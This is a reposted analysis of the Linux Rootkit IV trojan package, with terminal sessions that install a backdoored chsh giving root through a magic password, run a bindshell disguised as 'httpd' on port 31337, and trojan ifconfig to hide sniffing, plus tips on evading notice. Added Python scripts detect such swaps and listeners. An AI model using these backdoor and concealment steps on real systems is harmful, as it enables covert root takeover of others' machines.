[Repost] Linux Rootkit Analyze IV
Article author: Lord Somer
Linux Rootkit IV is the newest version of a well-known trojan package for Linux systems. The rootkit comes with the following utility programs and trojaned system commands: bindshell, chfn, chsh, crontab, du, find, fix, ifconfig, inetd, killall, linsniffer, login, ls, netstat, passwd, pidof, ps, rshd, sniffchk, syslogd, tcpd, top, wted, z2
In this example I tested chsh, bindshell and ifconfig.
In the first example below, I compiled only chsh in the chsh directory and used 'fix' to replace the original with the trojaned version.
[root@parittaja chsh]# ls -al
total 201
drwxr--r-- 2 jj jj 1024 Mar 18 02:10 .
drwxr-xr-x 19 jj jj 1024 Mar 18 02:09 ..
-rw------- 1 jj jj 109 Nov 24 06:27 Makefile
-rwxr-xr-x 1 root dzeijay 185448 Mar 18 02:09 chsh
-rw------- 1 jj jj 8786 Nov 24 06:27 chsh.c
-rw------- 1 jj jj 5283 Nov 24 06:27 setpwnam.c
[root@parittaja chsh]# make
gcc -c -pipe -O2 -m486 -fomit-frame-pointer -I. -I -DSBINDIR=\"\" -DUSRSBINDIR=\"\" -DLOGDIR=\"\"
-DVARPATH=\"\" chsh.c -o chsh.o
gcc -c -pipe -O2 -m486 -fomit-frame-pointer -I. -I -DSBINDIR=\"\" -DUSRSBINDIR=\"\" -DLOGDIR=\"\"
-DVARPATH=\"\" setpwnam.c -o setpwnam.o
gcc -s -N chsh.o setpwnam.o -o chsh
[root@parittaja chsh]# ls -al
total 210
drwxr--r-- 2 jj jj 1024 Mar 18 02:10 .
drwxr-xr-x 19 jj jj 1024 Mar 18 02:09 ..
-rw------- 1 jj jj 109 Nov 24 06:27 Makefile
-rwxr-xr-x 1 root dzeijay 185448 Mar 18 02:10 chsh
-rw------- 1 jj jj 8786 Nov 24 06:27 chsh.c
-rw-r--r-- 1 root dzeijay 5544 Mar 18 02:10 chsh.o
-rw------- 1 jj jj 5283 Nov 24 06:27 setpwnam.c
-rw-r--r-- 1 root dzeijay 2488 Mar 18 02:10 setpwnam.o
[root@parittaja chsh]# ../fix /usr/bin/chsh ./chsh ../backup/chsh
fix: Last 17 bytes not zero
fix: Can't fix checksum
fix: File /usr/bin/chsh fixed
[root@parittaja chsh]# ls -al /usr/bin/chsh
-rwsr-xr-x 1 root root 185448 Mar 18 02:08 /usr/bin/chsh
[root@parittaja chsh]# ls -al ../backup/chsh
-rwsr-xr-x 1 root dzeijay 9620 Mar 18 02:11 ../backup/chsh
[root@parittaja chsh]#
As can be seen, the fixing wasn't all that successful, and the trojaned program would easily be caught because of its huge size.
Later on, it is easy to get a root shell by typing the specific password.
[jj@rikas jj]$ id
uid=511(jj) gid=530(jj) groups=530(jj)
[jj@rikas jj]$ chsh
Changing shell for jj.
New shell [/bin/tcsh]: satori
[root@rikas jj]# id
uid=0(root) gid=0(root) groups=530(jj)
[root@rikas jj]# exit
exit
[jj@rikas jj]$
A problem with chsh (and chfn) is that the original system commands in newer Linux systems ask for the user's password before asking for a new shell etc. The trojaned versions in these rootkits don't do that and are therefore easily discovered. But it wouldn't take much to implement that, or better still to trojan the newer versions of chsh and chfn. This is a reminder of the system-specific requirements of trojan programs: a trojan coder (and user, naturally!) must know exactly how the original command behaves, otherwise they are immediately caught. This limits the portability and distribution of existing trojans to the specific systems (platforms, kernel versions, distributions and program versions etc.) they were made for.
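A defender's counterpart to the 'fix' step above, added here as an example and not code from the original article or from Linux Rootkit IV: the session shows the trojaned chsh at 185448 bytes where the backup of the original is 9620 bytes, and fix reporting that it could not repair the checksum. A baseline of size, mode and a strong hash of each binary, recorded while the system is known-good and stored off-host, catches such a swap whether or not the rootkit's timestamp and checksum forgery succeeded. The demo data is constructed (the sizes mirror the page, the digests are placeholders), and the function names are mine.

```python
"""Baseline check for replaced system binaries (added example, not part of lrk4).

Record size, permission bits and SHA-256 for each binary on a known-good host,
keep the result off-host, and re-check later. A swapped binary changes the hash
no matter how well its timestamp was forged; the size and setuid checks are
reported separately because they are what an admin notices first.
"""
import hashlib
import os
import stat

# Binaries the page shows being replaced; a real baseline covers far more.
DEFAULT_PATHS = ["/usr/bin/chsh", "/sbin/ifconfig"]


def fingerprint(path):
    """Return {"size", "mode", "sha256"} for one file, hashing it in chunks."""
    st = os.stat(path)
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return {"size": st.st_size, "mode": stat.S_IMODE(st.st_mode), "sha256": digest.hexdigest()}


def build_baseline(paths=DEFAULT_PATHS):
    """Snapshot every existing path; run this on a freshly installed host."""
    return {p: fingerprint(p) for p in paths if os.path.exists(p)}


def compare_baseline(baseline, current):
    """Return (path, finding) tuples for every deviation between two snapshots.

    Both arguments map path -> {"size", "mode", "sha256"}. The hash mismatch is
    the definitive signal; size and setuid changes are listed as well so the
    report reads like the 'ls -al' lines an admin would compare by hand.
    """
    findings = []
    for path, base in baseline.items():
        now = current.get(path)
        if now is None:
            findings.append((path, "missing"))
            continue
        if now["sha256"] != base["sha256"]:
            findings.append((path, "content changed (sha256 mismatch)"))
        if now["size"] != base["size"]:
            findings.append((path, "size %d -> %d" % (base["size"], now["size"])))
        base_suid = base["mode"] & stat.S_ISUID
        now_suid = now["mode"] & stat.S_ISUID
        if base_suid != now_suid:
            findings.append((path, "setuid bit " + ("added" if now_suid else "removed")))
    for path in current:
        if path not in baseline:
            findings.append((path, "not in baseline"))
    return findings


if __name__ == "__main__":
    # Constructed data mirroring the chsh swap on the page: original 9620 bytes,
    # trojan 185448 bytes, both setuid root. The digests are placeholders, not
    # real hashes of either binary.
    baseline = {"/usr/bin/chsh": {"size": 9620, "mode": 0o4755, "sha256": "known-good-digest"}}
    current = {"/usr/bin/chsh": {"size": 185448, "mode": 0o4755, "sha256": "some-other-digest"}}
    for path, what in compare_baseline(baseline, current):
        print("%s: %s" % (path, what))
```

Compare a fresh scan taken from a trusted boot environment against the stored baseline. The rootkit's trojaned ls, find and du (all in the lrk4 list above) can misreport sizes to someone looking by hand on the compromised host, but they do not change the bytes that open() and a hash routine read.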
The second example is a more sophisticated rootkit/trojan "attack" and utilizes the "bindshell" program that comes with Linux Rootkit IV. Bindshell "binds" itself to a specific port and waits for new connections. When a connection is established (from the same computer or from somewhere else), you can type commands ending with a semicolon, and bindshell executes them on the system with root privileges (if bound as root). Very handy.
In the example below, bindshell is first compiled and the right owner is set. Then I renamed it to 'httpd' to make it harder to notice and finally started it in the background. It would be wise to pick a process name that is widely used on the system and relatively small (of course you could make the bindshell program exactly as big as some specific process) to make it as transparent as possible. Such running programs are harder to track on large systems where there are lots of user processes running.
[root@parittaja lrk4]# make bindshell
gcc -O2 -fomit-frame-pointer -pipe -I/usr/include/bsd -include /usr/include/bsd/bsd.h
bindshell.c -lbsd -o bindshell
[root@parittaja lrk4]# chown root.root bindshell
[root@parittaja lrk4]# mv bindshell httpd
[root@parittaja lrk4]# ls -al httpd
-rwxr-xr-x 1 root root 5339 Mar 18 02:36 httpd
[root@parittaja lrk4]# httpd
[root@parittaja lrk4]# rm httpd
[root@parittaja lrk4]# ps aux | grep httpd
nobody 1378 0.0 1.6 1168 504 ? S Mar 14 0:00 httpd
nobody 1379 0.0 1.4 1168 436 ? S Mar 14 0:00 httpd
nobody 1380 0.0 1.3 1168 432 ? S Mar 14 0:00 httpd
nobody 1381 0.0 1.3 1168 416 ? S Mar 14 0:00 httpd
nobody 1382 0.0 1.3 1168 428 ? S Mar 14 0:00 httpd
root 319 0.0 1.1 1168 356 ? S Jan 5 0:00 httpd
root 18281 0.0 0.7 856 224 ? S 02:33 0:00 httpd
root 18518 0.0 1.1 968 340 p4 S 02:37 0:00 grep httpd
[root@parittaja lrk4]#
Now that the process is running, I can contact the victim computer from any other computer with telnet or the like and do what I wish with root privileges. Notice that I don't even need a user account on the target machine - there's no login!
[jj@rikas jj]$ telnet parittaja 31337
Trying 10.0.0.61...
Connected to parittaja.sec.
Escape character is '^]'.
ls -al /root/private.txt;
-rw-r--r-- 1 root root 0 Mar 18 02:30 /root/private.txt
: command not found
rm -f /root/private.txt;
: command not found
ls -al /root/private.txt;
ls: /root/private.txt: No such file or directory
: command not found
exit;
Connection closed by foreign host.
[jj@rikas jj]$
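An added detection example for the bindshell session above (mine, not from the article or from Linux Rootkit IV): the renamed bindshell is started on TCP port 31337 and its file is then deleted. Two things survive both the rename and the deletion: the listening socket still appears in /proc/net/tcp, and the kernel appends ' (deleted)' to the /proc/<pid>/exe link of a process whose binary was unlinked. Reading those files directly bypasses the netstat and ps binaries that the rootkit also replaces. The /proc/net/tcp excerpt embedded below is constructed, and the allow-list of expected ports and the function names are my assumptions.

```python
"""Find an unexpected TCP listener and tie it to a process, using /proc only.

Added example (not from the article or lrk4). The kernel-provided files under
/proc are read directly, so trojaned netstat/ps binaries are not consulted.
The sample /proc/net/tcp text is constructed; 31337 is the port the page uses.
"""
import os

TCP_LISTEN = "0A"  # socket state code for LISTEN in /proc/net/tcp

# Constructed excerpt: sshd listening on 22, a bindshell on 31337 (0x7A69),
# and one established connection (state 01) that must be ignored.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1001 1 0000000000000000 100 0 0 10 0
   1: 00000000:7A69 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 2002 1 0000000000000000 100 0 0 10 0
   2: 0100007F:0016 0100007F:B3C4 01 00000000:00000000 00:00000000 00000000     0        0 3003 1 0000000000000000 20 4 30 10 -1
"""


def parse_listeners(proc_net_tcp_text):
    """Return sorted (port, uid, inode) tuples for every socket in LISTEN state."""
    listeners = []
    for line in proc_net_tcp_text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 10 or fields[3] != TCP_LISTEN:
            continue
        port = int(fields[1].rsplit(":", 1)[1], 16)  # local_address is hexIP:hexPORT
        listeners.append((port, int(fields[7]), int(fields[9])))
    return sorted(listeners)


def unexpected_listeners(listeners, expected_ports):
    """Keep only listeners whose port is not on the allow-list."""
    return [entry for entry in listeners if entry[0] not in expected_ports]


def _pids():
    """Numeric entries of /proc, or an empty list on a host without procfs."""
    if not os.path.isdir("/proc"):
        return []
    return [int(p) for p in os.listdir("/proc") if p.isdigit()]


def pid_for_socket_inode(inode):
    """Walk /proc/<pid>/fd for a 'socket:[inode]' link; None if not found."""
    target = "socket:[%d]" % inode
    for pid in _pids():
        fd_dir = "/proc/%d/fd" % pid
        try:
            for fd in os.listdir(fd_dir):
                if os.readlink(os.path.join(fd_dir, fd)) == target:
                    return pid
        except OSError:
            continue  # not our process, or it exited meanwhile
    return None


def deleted_executables():
    """Return (pid, exe) for processes whose binary was unlinked after start."""
    hits = []
    for pid in _pids():
        try:
            exe = os.readlink("/proc/%d/exe" % pid)
        except OSError:
            continue  # kernel thread, or permission denied
        if exe.endswith(" (deleted)"):
            hits.append((pid, exe))
    return hits


if __name__ == "__main__":
    # Offline demo on the constructed sample, then a live look if this is Linux.
    found = parse_listeners(SAMPLE_PROC_NET_TCP)
    for port, uid, inode in unexpected_listeners(found, expected_ports={22}):
        print("unexpected listener: port %d uid %d inode %d" % (port, uid, inode))
    if os.path.exists("/proc/net/tcp"):
        with open("/proc/net/tcp") as f:
            live = parse_listeners(f.read())
        for port, uid, inode in live:
            print("live listener on port %d belongs to pid %s" % (port, pid_for_socket_inode(inode)))
    for pid, exe in deleted_executables():
        print("pid %d is running a deleted binary: %s" % (pid, exe))
```

The socket-to-pid walk needs root to read other users' fd directories; run it from a trusted environment, since the rootkit's ps and pidof are not needed for any of these steps. IPv6 listeners live in /proc/net/tcp6 with the same column layout and can be fed to the same parser.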
As an example of the programs that don't give a root shell, let's take a look at 'ifconfig'. Ifconfig is a general interface configuration tool for many purposes. You can set up your interface or check its current status. One classic feature of ifconfig is that it shows you whether an Ethernet card attached to the system is in so-called 'promiscuous mode'. That would indicate that somebody is sniffing the network traffic flowing past the card. If the sniffing is of malicious intent, it would be preferable to do it in silence. One solution is to trojan ifconfig.
[root@rikas net-tools-1.32-alpha]# /sbin/ifconfig
lo Link encap:Local Loopback
inet addr:127.0.0.1 Bcast:127.255.255.255 Mask:255.0.0.0
UP BROADCAST LOOPBACK RUNNING MTU:3584 Metric:1
RX packets:38794 errors:0 dropped:0 overruns:0 frame:0
TX packets:38794 errors:0 dropped:0 overruns:0 carrier:0
collisions:0
eth0 Link encap:Ethernet HWaddr 00:10:5A:3B:3C:0E
inet addr:10.0.0.81 Bcast:10.0.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
RX packets:3464563 errors:0 dropped:0 overruns:0 frame:0
TX packets:260648 errors:0 dropped:0 overruns:0 carrier:12
collisions:3099
Interrupt:10 Base address:0xb800
[root@rikas net-tools-1.32-alpha]#
Ifconfig shows that the Ethernet interface is running in promiscuous mode. So let's replace it with a trojaned version (compiled earlier; it comes with Linux Rootkit IV).
[root@rikas net-tools-1.32-alpha]# ../fix /sbin/ifconfig ./ifconfig ../backup/ifconfig
fix: Last 17 bytes not zero
fix: Can't fix checksum
fix: File /sbin/ifconfig fixed
[root@rikas net-tools-1.32-alpha]# ls -al /sbin/ifconfig
-rwxr-xr-x 1 root root 19840 maalis 17 23:33 /sbin/ifconfig
[root@rikas net-tools-1.32-alpha]# ls -al ../backup/ifconfig
-rwxr-xr-x 1 root dzeijay 25596 maalis 18 03:19 ../backup/ifconfig
[root@rikas net-tools-1.32-alpha]#
Now let's check again...
[root@rikas net-tools-1.32-alpha]# /sbin/ifconfig
lo Link encap:Local Loopback
inet addr:127.0.0.1 Bcast:127.255.255.255 Mask:255.0.0.0
UP BROADCAST LOOPBACK RUNNING MTU:3584 Metric:1
RX packets:38795 errors:0 dropped:0 overruns:0
TX packets:38795 errors:0 dropped:0 overruns:0
eth0 Link encap:10Mbps Ethernet HWaddr 00:10:5A:3B:3C:0E
inet addr:10.0.0.81 Bcast:10.0.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3464854 errors:0 dropped:0 overruns:0
TX packets:260910 errors:0 dropped:0 overruns:0
Interrupt:10 Base address:0xb800
[root@rikas net-tools-1.32-alpha]#
...and the 'PROMISC' is gone.
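An added example for the ifconfig trojan above (mine, not from the article or from Linux Rootkit IV): the flag word that ifconfig prints comes from the kernel, and the kernel also exposes it in /sys/class/net/<iface>/flags and through the SIOCGIFFLAGS ioctl, so a replaced /sbin/ifconfig cannot hide the PROMISC bit from a checker that reads those sources itself. Note, too, that the trojaned output above differs from the original in more than the missing word (the "frame", "carrier" and "collisions" counters are gone and the link type reads "10Mbps Ethernet"), which is the kind of behavioural mismatch the chsh section warned about. The sysfs flag map in the demo is constructed; IFF_PROMISC and SIOCGIFFLAGS are the real constants from <linux/if.h> and <linux/sockios.h>.

```python
"""Check promiscuous mode without trusting the ifconfig binary.

Added example (not from the article or lrk4). Reads the kernel's per-interface
flag word from sysfs and, independently, via the SIOCGIFFLAGS ioctl. Both
paths bypass /sbin/ifconfig entirely. The sample flag map is constructed.
"""
import fcntl
import os
import socket
import struct

IFF_PROMISC = 0x100    # <linux/if.h>
SIOCGIFFLAGS = 0x8913  # <linux/sockios.h>
SYSFS_NET = "/sys/class/net"

# Constructed sysfs contents: 0x1103 = UP|BROADCAST|PROMISC|MULTICAST, what a
# sniffing eth0 like the one on the page reports; lo is 0x9 = UP|LOOPBACK.
SAMPLE_FLAGS = {"lo": "0x9\n", "eth0": "0x1103\n"}


def flags_say_promisc(flags_text):
    """Parse one sysfs 'flags' file (a hex string) and test the IFF_PROMISC bit."""
    return bool(int(flags_text.strip(), 16) & IFF_PROMISC)


def promisc_interfaces(flag_map):
    """Sorted names of interfaces whose flag word has IFF_PROMISC set."""
    return sorted(name for name, text in flag_map.items() if flags_say_promisc(text))


def read_sysfs_flags(root=SYSFS_NET):
    """Collect {iface: flags_text} from sysfs; empty dict on hosts without it."""
    result = {}
    if not os.path.isdir(root):
        return result
    for name in os.listdir(root):
        try:
            with open(os.path.join(root, name, "flags")) as f:
                result[name] = f.read()
        except OSError:
            continue
    return result


def ioctl_promisc(ifname):
    """Second, independent source: ask the kernel via SIOCGIFFLAGS (Linux only).

    struct ifreq is a 16-byte name followed by a 16-byte union; for this
    request the union holds a short. Returns True/False, or None if the
    query cannot be made (no such interface, non-Linux host).
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    except OSError:
        return None
    try:
        req = struct.pack("16sH14s", ifname.encode(), 0, b"\x00" * 14)
        res = fcntl.ioctl(sock.fileno(), SIOCGIFFLAGS, req)
        return bool(struct.unpack("16sH14s", res)[1] & IFF_PROMISC)
    except OSError:
        return None
    finally:
        sock.close()


if __name__ == "__main__":
    print("constructed sample, promiscuous:", promisc_interfaces(SAMPLE_FLAGS))
    live = read_sysfs_flags()
    for name in sorted(live):
        print("%s sysfs=%s ioctl=%s" % (name, flags_say_promisc(live[name]), ioctl_promisc(name)))
```

One caveat for current kernels: a sniffer that enables promiscuity through a packet socket (as modern tcpdump does) is counted in the interface's promiscuity counter rather than in this flag word, so pair the check with `ip -d link show` (which prints "promiscuity N") and with the kernel's "entered promiscuous mode" log line, shipped to another host, since lrk4 also trojans syslogd.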
Linux Rootkit IV compiles fine on an old RedHat 4.2 (libc5), but requires modifications for newer systems.
Fear...your system may be trojaned...